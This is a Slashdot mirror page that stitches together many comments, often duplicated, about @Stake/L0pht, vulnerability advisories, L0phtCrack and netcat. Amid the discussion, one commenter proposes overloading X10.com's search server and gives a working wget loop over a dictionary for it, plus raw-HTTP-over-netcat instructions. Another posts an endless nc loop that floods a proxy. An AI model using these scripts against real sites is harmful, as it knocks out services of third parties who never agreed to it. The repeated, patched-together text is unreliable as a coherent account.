Slashdot Mirror

I think it was around 7-8 years ago they went from "releasing cool tools" to "whoring for big consulting contracts and never, ever releasing anything cool." Have you seen their website? Microsoft's website looks more "authentic" than that crap.

According to a vulnerability report release by @Stake, this fixes a serious security hole.

http://www.atstake.com/research/advisories/2003/a0 41003-1.txt


Overview:

DirectoryServices is part of the MacOS X information and authentication subsystem. It is launched at startup, setuid root and installed by default. It is vulnerable to several attacks ultimately allowing a local user to obtain root privileges.


Details:

During the startup of DirectoryService, the application creates a lock file by executing the touch(1) UNIX command. It executes touch through the system() libc function. This function is inherently insecure and its use is strongly discouraged in privileged applications.
Since this call to system() does not specify a full path to the touch(1) command, it is possible for an attacker to modify the PATH environment variable to specify a directory containing her own version of the touch(1) command. In this instance, this would cause DirectoryService to execute arbitrary commands as root.

In order for an attacker to exploit this vulnerability, they must first cause DirectoryServices to terminate. This can be done by simply connecting to port 625 repeatedly using an automated program.

According to a vulnerability report release by @Stake, this fixes a serious security hole.

http://www.atstake.com/research/advisories/2003/a0 41003-1.txt


Overview:

DirectoryServices is part of the MacOS X information and authentication subsystem. It is launched at startup, setuid root and installed by default. It is vulnerable to several attacks ultimately allowing a local user to obtain root privileges.


Details:

During the startup of DirectoryService, the application creates a lock file by executing the touch(1) UNIX command. It executes touch through the system() libc function. This function is inherently insecure and its use is strongly discouraged in privileged applications.
Since this call to system() does not specify a full path to the touch(1) command, it is possible for an attacker to modify the PATH environment variable to specify a directory containing her own version of the touch(1) command. In this instance, this would cause DirectoryService to execute arbitrary commands as root.

In order for an attacker to exploit this vulnerability, they must first cause DirectoryServices to terminate. This can be done by simply connecting to port 625 repeatedly using an automated program.

l0phtCrack really can do this - by exploting weaknesses in Windows password hashing it is possible to know that you have some of the characters right without getting the whole password. This paper goes into the gory detail...

l0phtCrack really can do this - by exploting weaknesses in Windows password hashing it is possible to know that you have some of the characters right without getting the whole password. This paper goes into the gory detail...

Eweek has their typical (puffy, low on tech details) take on it here. Since they don't specify the OS, I'm assuming these are drivers for Windows.

"The Linux, NetBSD and Microsoft Windows operating systems are known to have vulnerable link layer implementations, and it is extremely likely that other operating systems are also affected."

Secondly, This is a Hyperlink. They are sometimes used on the World Wide Web, to link relevant and useful resources together. Had you followed this particular link, you would have found the CERT advisory about the problem AND a link the @Stake's own advisory and white paper about the problem.

Thank you

Eweek has their typical (puffy, low on tech details) take on it here. Since they don't specify the OS, I'm assuming these are drivers for Windows.

"The Linux, NetBSD and Microsoft Windows operating systems are known to have vulnerable link layer implementations, and it is extremely likely that other operating systems are also affected."

Secondly, This is a Hyperlink. They are sometimes used on the World Wide Web, to link relevant and useful resources together. Had you followed this particular link, you would have found the CERT advisory about the problem AND a link the @Stake's own advisory and white paper about the problem.

Thank you

It is a shame none of Linux vendors provided their status. I am sure CERT notified them well in advance.

That's the only explanation that makes sense. He's trying to discredit MS-bashers by providing such an excellent example of false and childish anti-MS claims. The original @Stake paper (don't blame me for the format) not only lists vulnerable Linux drivers, it seems to list only Linux drivers. Windows is mentioned exactly once, and only in a vague afterthought kind of way; the focus is on the vulnerability as it exists on Your Favorite OS.

One step futher: Given that Linux is GPL the flaw can be not only shown but demonstrated... given this is GPL I suppose we can expect a 2.4.21 or 22 to correct these flaws.

There actual advisory from @stake that the article quotes can be found here - it's got a few more technical details and code fragments from the Linux kernel, but there's not really much else to say.

It also shows sample frame captures illustrating leakage of HTTP traffic.

There actual advisory from @stake that the article quotes can be found here - it's got a few more technical details and code fragments from the Linux kernel, but there's not really much else to say.

It also shows sample frame captures illustrating leakage of HTTP traffic.

@stake's advisory release:
http://www.atstake.com/research/advisories/2003/a0 10603-1.txt

And their etherleak report PDF:
http://www.atstake.com/research/advisories/2003/at stake_etherleak_report.pdf

@stake's advisory release:
http://www.atstake.com/research/advisories/2003/a0 10603-1.txt

And their etherleak report PDF:
http://www.atstake.com/research/advisories/2003/at stake_etherleak_report.pdf

I don't know enough about HTML/perl/etc., but there must be a way to set up a script to submit queries to the "Search this site" box that most websites have. Vary the query so it cannot be cached. Doesn't really matter if the search terms are meaningful. /dev/random even. Just make thier Win2K/IIS server farm chug away on thousands of searches for hours.

That's a very interesting idea.

Sticking with the X10 example, their search URL is http://www.x10.com/cgi-bin/search /search_index.cgi?search=QUERY (without the space) so writing in your shell command line something like this, would do your trick:

mercy_level=10; x10=http://www.x10.com; referer=$x10/products/products.htm; search=$x10/cgi-bin/search/search_index.cgi?search ; agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)'; for query in `cat /usr/share/dict/words`; do echo "*** Quering for $query:"; wget --user-agent="$agent" --cache=off --referer=$referer $search=$query --output-document=/dev/null; echo "*** Waiting ${mercy_level}s..."; sleep $mercy_level; done

(again, it's a one big-ass line)

It searches X10.com for every word in the dictionary located at /usr/share/dict/words, ignoring the results (or should I say, storing them in /dev/null?). It looks like MS Internet Explorer 5.5 under Windows 2000.

It would be easy to write without wget, to just connect with their server, send the HTTP query and drop the connection after the first line of answer header (or maybe using HEAD instead of GET?) to save the bandwidth, but the bandwidth is not an issue here (however it's still interesting: netcat (a TCP/IP Swiss Army Knife) would work great for making raw TCP connections from the shell, but if you prefer Swiss Army Chainsaw instead, then of course Perl (with Socket or IO::Socket or LWP or LWP::Simple) is the tool -- again, There's More Than One Way To Do It).

This attack, unlike the one with downloading statical content, would be directed to their database CPU/RAM/IO resources.

Actually, why use wget (or anything else for that matter)? Here's a cooler idea: Run nc -lp 1234 and point your browser to http://localhost:1234/ to see how do your real HTTP queries look like. E.g. for my Mozilla it's:

GET / HTTP/1.1
Host: localhost:1234
User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.0.0)
Gecko/20020623 Debian/1.0.0-0.woody.1
Accept: text/xml,application/xml,application/xhtml+xml,tex t/html;q=0.9,text/plain;q=0.8,video/x-mng,image/pn g,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive

Now, we can just change Host to www.x10.com and "GET /" to "GET /cgi-bin/search/search_index.cgi?search=QUERY" (and maybe add Referer header) and we have our HTTP query string, which after echo $http_query_string | nc www.x10.com 80 we have a response, looking exactly like a real browser (with JavaScript and downloading pictures turned off).

Of course, don't do that, unless you think it is OK... I take no responsibility for anything anyone could do with anything at all.

echo GET http://spammer.host.tld/ HTTP/1.0>spam.txt
echo Host: spammer.host.tld>>spam.txt
echo User-Agent: SPAMMER/1.0 (die; faggots)>>spam.txt
echo Pragma: no-cache>>spam.txt
echo.>>spam.txt
:begin
nc cache.isp.tld 3128<spam.txt>nul
goto begin

NTLM is a bug. If you do not think so, I suggest you use L0phtCrack.

hes talking about netcat, the general purpose network swiss army knife.

you should install it, its probably one of the most useful netowrk utilities ever written.

Serveral of the "security agencies" in Canada offer courses which are fairly strong overviews. The RCMP technical security branch offers a number of workshops for free. I have taken the 4 day IT security officer and 1 day malacious code course and both were very good overviews.

The Communications Security Establishement (Canada's NSA) offers a number of courses quite cheap. This is a good place to start and often provide a wealth of resources for additional learning. I would look into whether the same exist in your country...

SANS reading room boasts 1300 research papers. Here are some other places for reading off the top of my head:

@Stake
phrack
antionline
securityfocus

There are tons more if you look

Sig, Shmig...who needs one

1. Tcpflow - read contents of tcp traffic in real time. Great for watching browser/webserver interactions.
   
2. Netcat - connect Unix pipes to TCP sockets. Should have been part of Unix since the advent of TCP/IP. Great for rigging a temporary "server" to see if a client is connecting as advertised: nc -lp 80.
   
3. X Resources (as seen in ~/.Xdefaults) - you can make xterms really dark, even when running colored apps like mutt, with dark Xresources like: XTerm*color9: #690000 - man xterm for meanings of color0-15.
   xrdb -merge .darkXres to use.
   
4. Xmessage - useful in crontabs to remind you of periodic things - like remembering to go home. With the right params, it can take over the whole screen, which is hard to ignore.
   
5. perl -pi.bak -e's/chocolate/vanilla/g' *.recipe - change a bunch of files, leaving backups.
   

I always use Netcat or one of its variants (such as OpenBSD's obnc or cryptcat, say) to do that sort of thing, and a number of other little wierdnesses besides. Certainly it isn't as smart as telnet, but it does the jobs I need it to and more besides.

First off, the reason your security is broken is that you probably don't have a policy and if you do nobody understands it and if they do there's no QA ensuring that they follow it.

Good security starts with the establishment of a security policy followed by education and regular awareness events. Please be aware that paying someone a ton of money to pen. test and inventory your assets will *not* result in a stronger security posture all on it's own. You must have a policy in place and you must compel your users to abide by it (primarily through education, secondarily through threat of penalty). Consider hiring a CISSP or other certified professional to help you through this process. You might be able to find one in your area by using the ISC2 directory. SANS is doing some ISO certification as part of the GIAC program now and they may be able to point you towards some appropriate people as well. The ISSA might be able to help as well. As has been mentioned already, you probably don't want to entrust this to someone selling countermeasures or management services.

Understand, however, that you don't need a firewall engineer right now and you don't need some krad ex-hacker to pen test either. You need someone to help you get your house in order on the administrative side and then you can look into some detailed engineering and assessment. That someone should probably be an independent consultant or at least one working with an infosec specializing firm. If you want a couple bigger names there's @Stake, Booz Allen Hamilton, and Predictive, however, I would encourage you to seek out a local independent with good references.

Any knucklehead can run Nessus and patch systems. This alone does not equal information security. If you want a secure environment, start by defining what "secure" means within your environment.

The Cult of the Dead Cow spun off L0pht Heavy Industries, a security consultancy, which then changed its name to @Stake. @Stake is well-respected, and produces good papers on the the theory and practice of security holes. But then, so did CdC.

Netcat is a great tool for that. A "network swiss army knife" if you will.

The still-excellent l0pht once informed the world that Microsoft had a serious security problem in a product.MS responded with the famous "That vulnerability is purely theoretical.". So, l0pht released a real exploit for the vulnerability.

Apologies, it's hard to find the original links since l0pht got up in the morning, put on a suit, and became @stake

Hello. Wake up. Theoretical vulnerabilites become real, nasty, exploited vulnerabilites very fast. I assume you read comp.risks?

Looks like it isn't very likely to succeed

LOOKS LIKE? It's a done deal. Somebody has exploited a widely-distribited scripting engine. The people who did it as a "proof-of-concept" have proven that the interpreter for this language is wide-open and gagging for a jolly good rogering. I wonder how many unchecked buffers there are in that code. I wonder how it handles multi-byte characters. I desperately hope it wasn't written in C.

I sit here as a smug old Unix hacker, secure in the knowledge that lisp and Smalltalk programs are unlikely to be attacked in the same way that C programs are.

I'm also sure I'm wrong.

I gaurantee this hacking school will attract a lot of genuine soon-to-be kiddies and nothing but negative exposure for the school itself. As everyone here is saying, they seem to be teaching more of a cracking style than hacking or security. I would seek out a more reputable source of education if I wanted to learn more than "the fine art of breaking into systems". Security education at @stake just doesn't compare to the quality you get at Xintra. You're not going to go to fast-food for gourmet.

It is quite sad to see that the former l0pht (hopefully you remember them), who went corporate and melted into @stake, have joined the "coalition against full disclosure of computer vulnerability information". I'm amazed that Mudge and Weld Pond would turn full circle and endorse this sort of thing. The l0pht were the sort of people who stood for full disclosure. Too bad they have made this decision. I have lost my respect for them.

At least eEye are keeping their heads about them.

It is quite sad to see that the former l0pht (hopefully you remember them), who went corporate and melted into @stake, have joined the "coalition against full disclosure of computer vulnerability information". I'm amazed that Mudge and Weld Pond would turn full circle and endorse this sort of thing. The l0pht were the sort of people who stood for full disclosure. Too bad they have made this decision. I have lost my respect for them.

At least eEye are keeping their heads about them.

Hey,

Bindview, Foundstone, Guardent, @Stake, and Internet Security Systems joined with the software-maker to declare they would immediately begin

Wasn't @stake formed from hacker group l0pht? Yes, I think they were! They used to attend Def Con, and work on Back Orifice and L0phtCrack?? Didn't they get banned from BugTraq because they posted links to thier site in the place of good, solid descriptions?

My, how times change.

-M

one link... Here l0phtcrack. Cracking windows passwords for years.

"There is some value for having details in the advisories, but not exploit code. " said Chris Wysopal, director of research and development for security firm @Stake,


Once you have the details of what's vulnerable you're less than an hour away from an exploit, even if you're a VB programmer. The message that needs to get out to Culp and others looking to sweep their flaws under the carpet is that once the flaw is published, the exploit is on it's way! Putting the exploit out there forces unwary admins to patch before they get hit. And, if they don't stay on top of security for their system and they get owned; fine. Find a different admin.

The other thing that bothers me about the article is the uncharacteristicly congenial tone Wysopal took WRT M$. Weren't the guys who formed @Stake the same ones slinging shit at them back before they founded @Stake? (Inclusion of an example with an exploit purely intentional.) Takes my opinion of them down a notch.

I don't know much about how this bill would be interpreted were it to come to law, but it seems to me that making security bugs known to the general public could be construed as giving advice to a hacker since, well, it alerts the general public to security problems.

Security sites often post code that can be used to exploit a particular hole, so that the hole can be better understood and more easily patched.

What about tools like L0phtcrack?

The biggest thing is that if you aren't an excellent sysadmin yourself, find a nuetral but qualified consultant to help with the interviewing process!

I'm reminded of the time that Mudge from the l0pht (now @stake) told the story of how he did this for a company seeking a security professional, and the interviewee proceeded to tell Mudge how the interviewee wrote L0phtcrack! (For those who don't know it, it is Mudge who wrote L0phtcrack.) Mudge went on to quite Sarcastically tell the Manager he was consulting for: "L0phtcrack is a great program. You should hire him!"

Needless to say, the Manger was quite happy he followed the aforementioned advice!

On my network. I found it quite humorous that one of the heads of the companies password was "womanizer". For you network admins on NT networks, all you've got to do is use the handy dandy L0phtcrack and dump them from you PDC. I guess NT is good for something(password auditing surveys)
Jason

All this hostility towards open source software...you'd almost think they weren't hosting HotMail's DNS with FreeBSD. Almost.

-Legion

i think you're looking for the l0pht.. i mean, @stake :)
-----

Well I just created my 1st Slashdot user account, because I hope this post will get read and moderated up.

Phil Zimmermann has left Network Associates, citing "philosophical differences", and NAI PGP has just become closed source software. PGP without source is not PGP. Slashdot readers know why. Please avoid Network Associates PGP version 7.x.x, and spread the word.

Cyber Knights Templar PGP 6.5.8 is open source PGP for Windows users, and includes a security patch for a very nasty remote exploit against "official" NAI PGP 6.5.8., the ascii armor parsing bug.

GPG is the wave of the future, but in the present, user friendly Windows support for strong crypto is still important. This support is provided by the Cyber Knights Templar builds, which also include the AES cipher (Rijndael 256) and large key support.

Please publicise this address, where Win32 binaries and full source code are posted for download:

http://www.ipgpp.com/

There is no charge for CKT PGP, and BTW, I am not afilliated in any way with the CKT folks.

99 buckets of bits on the wall...

Using things like iButton does not get around the issue here. All you have done is slightly shift the nature and physical whereabouts of the device which contains the private key/shared secret/magic word that opens the castle gates.

Don't consider it that way? Examine this: http://www.atstake.com/research/advisories/2001/in dex_q1.html#011801-1

The bottom line is what it always has been: security is a matter of depth and cannot possibly be judged by the technical merits of any one component. Like a chain, the weakest link defines the strength of the entire system.

With the large number of blackhats likely to be in the population of those pissed-off about the way things have been going, I'm surprised that the RIAA and its major members still have intact web prescence. Not that I'm advocating or condoning civil disobedience as a means of political action. Oh, and I'm also surprised to see that the MPAA site is up.

On another note, check this clip from DataPlay's Company FAQ:

DataPlay's visionary team brings the company over 1,000 years of cumulative experience in optical, electrical and mechanical engineering technologies, the Internet and content distribution.

On another note, check this clip from DataPlay's Company FAQ:

DataPlay's visionary team brings the company over 1,000 years of cumulative experience in optical, electrical and mechanical engineering technologies, the Internet and content distribution.

This will come off as a bit biased (which it is), but I work for a company that has written some software called Hailstorm that's very good at helping you test your own security. It's especially good in situations where you have written something custom, whether it be a CGI script or some sort of server program. It succeeds where security scanners fail, because it can help you find problems that are previously unknown. To see it in action analyzing IDS systems, check out the article at SecurityFocus. Good security consulting firms are VERY expenseive, so Hailstorm may be a good choice depending on what you are really looking for.

If you want to hire a security firm, I would suggest a few different companies: Securify, a division of Kroll-O'Gara; Guardent; Ernst & Young; @Stake; and Foundstone.

Also, if you are interested in trying out Hailstorm (which, for the time being, only runs on NT 4.0/W2K, although it can test applications on any OS), shoot me an email (removing the obvious part), and I'll help you out. A trial version can be downloaded at www.ClickToSecure.com.

The guys over at L0pht (which I didn't see at the MIT Flea yesterday...) were working on such a system. I wonder if it's mothballed due to their newfound partnership with @Stake. Hm.

My .02
Quux26

Pity about the @Stake web site - they seem to have had the "web is art" or "my browser is the only browser" designers in (or perhaps the black on black I got is an 'underground' thing).

So, who owns http://www.@stake.com? Or is likely to be 0wn3d later?

Having people who can speak "suit language" working as consultants with people who understand security technology looks like an important step to getting security taken seriously. For too long, security has been the "top priority" until it comes time to pay in [money,time to market,performance,usability] when the acceptable price turns out to be [some,nothing,nothing,nothing].

Let us hope that this company has the credibility, both business and technical, to make decision makers realise that it is possible to do better than is common with current offerings.

Pity about the @Stake web site - they seem to have had the "web is art" or "my browser is the only browser" designers in (or perhaps the black on black I got is an 'underground' thing).